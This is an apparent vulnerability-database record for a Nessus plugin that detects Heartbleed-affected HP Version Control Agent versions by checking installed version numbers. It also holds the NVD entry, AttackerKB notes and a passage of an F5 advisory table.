HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)
2014-08-06T00:00:00
ID HP_VCA_SSRT101531.NASL Type nessus Reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2021-01-02T00:00:00
Description
The installation of HP Version Control Agent (VCA) on the remote
Windows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or 7.3.1. It is,
therefore, affected by an information disclosure vulnerability.
An out-of-bounds read error, known as the 'Heartbleed Bug', exists
related to handling TLS heartbeat extensions that could allow an
attacker to obtain sensitive information such as primary key material,
secondary key material, and other protected content.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(77024);
script_version("1.10");
script_cvs_date("Date: 2019/11/25");
script_cve_id("CVE-2014-0160");
script_bugtraq_id(66690);
script_xref(name:"CERT", value:"720951");
script_xref(name:"EDB-ID", value:"32745");
script_xref(name:"EDB-ID", value:"32764");
script_xref(name:"EDB-ID", value:"32791");
script_xref(name:"EDB-ID", value:"32998");
script_xref(name:"HP", value:"emr_na-c04262472");
script_xref(name:"HP", value:"HPSBMU03020");
script_xref(name:"HP", value:"SSRT101531");
script_name(english:"HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)");
script_summary(english:"Checks the version of the VCA package.");
script_set_attribute(attribute:"synopsis", value:
"The remote host contains software that is affected by an information
disclosure vulnerability.");
script_set_attribute(attribute:"description", value:
"The installation of HP Version Control Agent (VCA) on the remote
Windows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or 7.3.1. It is,
therefore, affected by an information disclosure vulnerability.
An out-of-bounds read error, known as the 'Heartbleed Bug', exists
related to handling TLS heartbeat extensions that could allow an
attacker to obtain sensitive information such as primary key material,
secondary key material, and other protected content.");
# https://h20565.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04262472
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?d9ffb6dc");
script_set_attribute(attribute:"see_also", value:"http://www.heartbleed.com");
script_set_attribute(attribute:"see_also", value:"https://eprint.iacr.org/2014/140");
script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/vulnerabilities.html#2014-0160");
script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/secadv/20140407.txt");
script_set_attribute(attribute:"solution", value:
"Upgrade to VCA 7.3.2 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2014-0160");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"in_the_news", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2014/02/24");
script_set_attribute(attribute:"patch_publication_date", value:"2014/04/24");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/08/06");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:version_control_agent");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"Windows");
script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("hp_version_control_agent_installed.nbin");
script_require_keys("installed_sw/HP Version Control Agent");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("install_func.inc");
app = "HP Version Control Agent";
get_install_count(app_name:app,exit_if_zero:TRUE);
# Only one install possible for this software
installs = get_installs(app_name:app);
if (installs[0] == IF_NOT_FOUND) audit(AUDIT_NOT_INST,app);
install = installs[1][0];
version = install["version"];
path = install["path"];
# Unknown version
if (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_APP_VER,app);
fix = "7.3.2";
if (
version =~ "^7\.2\.[0-2]\." ||
version =~ "^7\.3\.[0-1]\."
)
{
port = get_kb_item("SMB/transport");
if (!port) port = 445;
if (report_verbosity > 0)
{
report =
'\n Path : ' + path +
'\n Installed version : ' + version +
'\n Fixed version : ' + fix +
'\n';
security_warning(port:port,extra:report);
}
else security_warning(port);
}
else audit(AUDIT_INST_PATH_NOT_VULN, app, version, path);
{"id": "HP_VCA_SSRT101531.NASL", "bulletinFamily": "scanner", "title": "HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)", "description": "The installation of HP Version Control Agent (VCA) on the remote\nWindows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or 7.3.1. It is,\ntherefore, affected by an information disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.", "published": "2014-08-06T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/77024", "reporter": "This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.openssl.org/news/vulnerabilities.html#2014-0160", "https://eprint.iacr.org/2014/140", "http://www.nessus.org/u?d9ffb6dc", "https://www.openssl.org/news/secadv/20140407.txt", "http://www.heartbleed.com"], "cvelist": ["CVE-2014-0160"], "type": "nessus", "lastseen": "2021-01-01T03:15:41", "edition": 27, "viewCount": 31, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-0160"]}, {"type": "f5", "idList": ["F5:K15159", "SOL15159"]}, {"type": "attackerkb", "idList": ["AKB:D165638B-97C5-4C99-BFA0-70576DB52324"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940"]}, {"type": "kitploit", "idList": ["KITPLOIT:8800200070735873517", "KITPLOIT:7942195329946074809"]}, {"type": "citrix", "idList": ["CTX140605"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30498", "SECURITYVULNS:DOC:30501", "SECURITYVULNS:DOC:30506", "SECURITYVULNS:DOC:30496", "SECURITYVULNS:DOC:30522", "SECURITYVULNS:DOC:30696", "SECURITYVULNS:DOC:30500", "SECURITYVULNS:DOC:30523", "SECURITYVULNS:DOC:30526", "SECURITYVULNS:DOC:30472"]}, {"type": "hackerone", "idList": ["H1:32570", "H1:49139", "H1:6475"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:151177", "PACKETSTORM:126308", "PACKETSTORM:126288", "PACKETSTORM:126072"]}, {"type": "nessus", "idList": ["ATTACHMATE_REFLECTION_X_HEARTBLEED.NASL", "MCAFEE_FIREWALL_ENTERPRISE_SB10071.NASL", "KERIO_CONNECT_824.NASL", "FEDORA_2014-5337.NASL", "HP_VCRM_SSRT101531.NASL", "SMB_KB2962393.NASL", "OPENSSL_HEARTBLEED.NASL", "FEDORA_2014-4999.NASL", "BLUECOAT_PROXY_AV_3_5_1_9.NASL", "STUNNEL_5_01.NASL"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E5ADFE523AF247AA238C3E63EF7B0A8F", "EXPLOITPACK:1020403320036D688D074B47660E9F50"]}, {"type": "vulnerlab", "idList": ["VULNERLAB:1254"]}, {"type": "seebug", "idList": ["SSV:62188", "SSV:62241", "SSV:62192", "SSV:62182", "SSV:62189", "SSV:62185", "SSV:62180", "SSV:86019", "SSV:62198", "SSV:62086"]}, {"type": "thn", "idList": ["THN:244769C413FFA5BE647D8F6F93431B74", "THN:847F48AE6816E6BFF25355FC0EA7439A", "THN:3E9A13AAEA7FDC38D7BD8A148F19663D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310881918", "OPENVAS:1361412562310105010", "OPENVAS:1361412562310105040", "OPENVAS:1361412562310103936", "OPENVAS:1361412562310871154"]}, {"type": "symantec", "idList": ["SMNTC-1364"]}, {"type": "ics", "idList": ["ICSA-14-135-02", "ICSA-14-135-04", "ICSA-14-135-05", "ICSA-14-105-03B", "ICSA-14-105-02A"]}, {"type": "cisco", "idList": ["CISCO-SA-20140409-HEARTBLEED", "CISCO-SA-20140408-CVE-2014-0160"]}, {"type": "redhat", "idList": ["RHSA-2014:0396", "RHSA-2014:0378", "RHSA-2014:0377"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-38927", "ATLASSIAN:JRACLOUD-38927"]}, {"type": "threatpost", "idList": ["THREATPOST:15624C23F5CD5AC1029501D08A99D294"]}, {"type": "zdt", "idList": ["1337DAY-ID-22172"]}, {"type": "hp", "idList": ["HP:C04262495"]}, {"type": "centos", "idList": ["CESA-2014:0376"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2014-0160"]}], "modified": "2021-01-01T03:15:41", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-01-01T03:15:41", "rev": 2}, "vulnersScore": 4.5}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77024);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"HP\", value:\"emr_na-c04262472\");\n script_xref(name:\"HP\", value:\"HPSBMU03020\");\n script_xref(name:\"HP\", value:\"SSRT101531\");\n\n script_name(english:\"HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks the version of the VCA package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains software that is affected by an information\ndisclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installation of HP Version Control Agent (VCA) on the remote\nWindows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or 7.3.1. It is,\ntherefore, affected by an information disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.\");\n # https://h20565.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04262472\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9ffb6dc\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VCA 7.3.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:version_control_agent\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"hp_version_control_agent_installed.nbin\");\n script_require_keys(\"installed_sw/HP Version Control Agent\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = \"HP Version Control Agent\";\nget_install_count(app_name:app,exit_if_zero:TRUE);\n\n# Only one install possible for this software\ninstalls = get_installs(app_name:app);\nif (installs[0] == IF_NOT_FOUND) audit(AUDIT_NOT_INST,app);\n\ninstall = installs[1][0];\nversion = install[\"version\"];\npath = install[\"path\"];\n\n# Unknown version\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_APP_VER,app);\n\nfix = \"7.3.2\";\nif (\n version =~ \"^7\\.2\\.[0-2]\\.\" ||\n version =~ \"^7\\.3\\.[0-1]\\.\"\n)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_warning(port:port,extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app, version, path);\n", "naslFamily": "Windows", "pluginID": "77024", "cpe": ["cpe:/a:hp:version_control_agent"], "scheme": null}
{"cve": [{"lastseen": "2020-12-09T19:58:19", "description": "The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\nCVSS V2 scoring evaluates the impact of the vulnerability on the host where the vulnerability is located. When evaluating the impact of this vulnerability to your organization, take into account the nature of the data that is being protected and act according to your organization\u2019s risk acceptance. While CVE-2014-0160 does not allow unrestricted access to memory on the targeted host, a successful exploit does leak information from memory locations which have the potential to contain particularly sensitive information, e.g., cryptographic keys and passwords. Theft of this information could enable other attacks on the information system, the impact of which would depend on the sensitivity of the data and functions of that system.", "edition": 13, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2014-04-07T22:55:00", "title": "CVE-2014-0160", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0160"], "modified": "2020-07-28T17:11:00", "cpe": ["cpe:/a:mitel:micollab:7.2", "cpe:/o:debian:debian_linux:6.0", "cpe:/a:mitel:mivoice:1.1.2.5", "cpe:/o:siemens:simatic_s7-1500_firmware:1.5", "cpe:/o:intellian:v100_firmware:1.21", "cpe:/a:mitel:mivoice:1.1.3.3", "cpe:/o:fedoraproject:fedora:19", "cpe:/o:redhat:enterprise_linux_server_eus:6.5", "cpe:/a:mitel:micollab:7.3", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:redhat:virtualization:6.0", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/a:redhat:gluster_storage:2.1", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:siemens:simatic_s7-1500t_firmware:1.5", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:13.10", "cpe:/o:intellian:v100_firmware:1.20", "cpe:/a:mitel:mivoice:1.4.0.102", "cpe:/a:mitel:mivoice:1.3.2.2", "cpe:/o:siemens:application_processing_engine_firmware:2.0", "cpe:/a:siemens:wincc_open_architecture:3.12", "cpe:/a:mitel:mivoice:1.2.0.11", "cpe:/o:siemens:cp_1543-1_firmware:1.1", "cpe:/o:canonical:ubuntu_linux:12.10", "cpe:/o:redhat:enterprise_linux_server_aus:6.5", "cpe:/o:fedoraproject:fedora:20", "cpe:/o:intellian:v100_firmware:1.24", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/a:mitel:micollab:7.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_server_tus:6.5", "cpe:/a:mitel:micollab:6.0", "cpe:/a:mitel:micollab:7.1", "cpe:/o:intellian:v60_firmware:1.15", "cpe:/a:redhat:storage:2.1", "cpe:/a:mitel:micollab:7.3.0.104", "cpe:/o:intellian:v60_firmware:1.25", "cpe:/o:opensuse:opensuse:12.3"], "id": "CVE-2014-0160", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:redhat:virtualization:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:19:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v60_firmware:1.15:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:12.3:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:20:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:micollab:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v100_firmware:1.20:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:application_processing_engine_firmware:2.0:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:simatic_s7-1500_firmware:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.2.0.11:*:*:*:*:skype_for_business:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:6.5:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.3.2.2:*:*:*:*:skype_for_business:*:*", "cpe:2.3:a:mitel:micollab:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.1.2.5:*:*:*:*:lync:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v100_firmware:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:micollab:7.3.0.104:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.4.0.102:*:*:*:*:skype_for_business:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:13.10:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:gluster_storage:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:wincc_open_architecture:3.12:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.10:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:micollab:7.1:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:cp_1543-1_firmware:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:storage:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:mivoice:1.1.3.3:*:*:*:*:skype_for_business:*:*", "cpe:2.3:a:mitel:micollab:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v60_firmware:1.25:*:*:*:*:*:*:*", "cpe:2.3:a:mitel:micollab:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:simatic_s7-1500t_firmware:1.5:*:*:*:*:*:*:*", "cpe:2.3:o:intellian:v100_firmware:1.24:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2020-11-18T06:44:13", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at April 13, 2020 8:54pm UTC reported:\n\nA missing boundary check causes versions of OpenSSL 1.0.1 \u2013 1.0.1f to be vulnerable to an out of bounds read as part of an SSL Heartbeat message. This vulnerability can be leveraged without authenticating in many instances to leak sensitive information such as passwords and private keys. Due to the vulnerability being in the OpenSSL library, exploits are implementation specific and may require changes to implement the applicable protocol.\n\nThe vulnerability was fixed in [this](<https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902>) patch.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 5**dmelcher5151** at April 15, 2020 4:14pm UTC reported:\n\nA missing boundary check causes versions of OpenSSL 1.0.1 \u2013 1.0.1f to be vulnerable to an out of bounds read as part of an SSL Heartbeat message. This vulnerability can be leveraged without authenticating in many instances to leak sensitive information such as passwords and private keys. Due to the vulnerability being in the OpenSSL library, exploits are implementation specific and may require changes to implement the applicable protocol.\n\nThe vulnerability was fixed in [this](<https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902>) patch.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 5\n", "modified": "2020-07-30T00:00:00", "published": "2014-04-07T00:00:00", "id": "AKB:D165638B-97C5-4C99-BFA0-70576DB52324", "href": "https://attackerkb.com/topics/8avLg1j8ou/cve-2014-0160-aka-heartbleed", "type": "attackerkb", "title": "CVE-2014-0160 (AKA: Heartbleed)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "f5": [{"lastseen": "2020-04-06T22:39:36", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\nF5 Product Development has assigned ID 456033 (BIG-IP), ID 456302 (BIG-IP Edge Client for Windows, Mac OS, and Linux), ID 456345 (BIG-IP Edge Client for Apple iOS), and ID 468659 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H456276 on the **Diagnostics** > **Identified** > **High** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP AAM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.4.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP AFM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.3.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Analytics | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP APM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP ASM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Edge Gateway | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None \nBIG-IP GTM | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP Link Controller | 11.5.0 - 11.5.1 | 11.6.0 \n11.5.2 \n11.5.1 HF1 - HF2 \n11.5.0 HF2 - HF3 \n11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP PEM | 11.5.0 - 11.5.1 | 11.3.0 - 11.4.1 | Configuration utility \nbig3d \nCOMPAT SSL ciphers \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 | None \nARX | None | 6.0.0 - 6.4.0 | None \nEnterprise Manager | 3.1.1 HF1 - HF2 | 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0 | big3d \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | None \nBIG-IQ Cloud | None | 4.0.0 - 4.3.0 | None \nBIG-IQ Device | None | 4.2.0 - 4.3.0 | None \nBIG-IQ Security | None | 4.0.0 - 4.3.0 | None \nFirePass Clients | None | 5520-6032 | None \nBIG-IP Edge Portal for iOS | None | 1.0.0 - 1.0.3 | None \nBIG-IP Edge Portal for Android | None | 1.0.0 - 1.0.2 | None \nBIG-IP Edge Clients for Android | None | 2.0.3 - 2.0.4 | None \nBIG-IP Edge Clients for Apple iOS | 2.0.0 - 2.0.1 \n1.0.5 - 1.0.6 | 2.0.2 \n1.0.0 - 1.0.4 | VPN \nBIG-IP Edge Clients for Linux | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nBIG-IP Edge Clients for MAC OS X | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nBIG-IP Edge Clients for Windows | 7080.* - 7080.2014.408.* \n7090.* - 7090.2014.407.* \n7091.* - 7091.2014.408.* \n7100.* - 7100.2014.408.* \n7101.* - 7101.2014.407.* | 6035 - 7071 \n7080.2014.409.* \n7090.2014.408.* \n7091.2014.409.* \n7100.2014.409.* (11.5.0 HF3) \n7101.2014.408.* (11.5.1 HF2) | VPN \nLineRate | None | 2.2.0 | None \n \n**Important**: For the hotfixes noted previously, the included version of OpenSSL has not been changed. F5 has patched the existing version of OpenSSL to resolve this vulnerability. As a result, on a patched BIG-IP system, the OpenSSL version is still OpenSSL 1.0.1e-fips. For more information about installed hotfix versions, refer to [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>).\n\nBIG-IP Edge Client fixes\n\nThis issue has been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in BIG-IP APM 11.5.1 HF2 and 11.5.0 HF3. This issue has also been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in an engineering hotfix in other BIG-IP APM versions. You can obtain the engineering hotfix by contacting [F5 Technical Support](<http:// http://www.f5.com/training-support/customer-support/contact/>) and referencing this article number and the associated ID number. Note that engineering hotfixes are intended to resolve a specific software issue until a suitable minor release, maintenance release, or cumulative hotfix rollup release is available that includes the software fix. For more information, refer to [K8986: F5 software lifecycle policy](<https://support.f5.com/csp/article/K8986>).\n\nYou can eliminate this vulnerability by running a version listed in the **Versions known to be not vulnerable** column. If the **Versions known to be not vulnerable** column does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nUpgrading to a version known to be not vulnerable, or taking steps to mitigate this vulnerability, does not eliminate possible damage that may have already occurred as a result of this vulnerability. After upgrading to a version that is known to be not vulnerable, consider the following components that may have been compromised by this vulnerability:\n\nSSL profile certificate/key pairs\n\nThe BIG-IP SSL profiles may reference SSL certificate/key pairs that were compromised. For information about creating new SSL certificate/key pairs for SSL profiles, refer to the following articles:\n\n * [K14620: Managing SSL certificates for BIG-IP systems using the Configuration 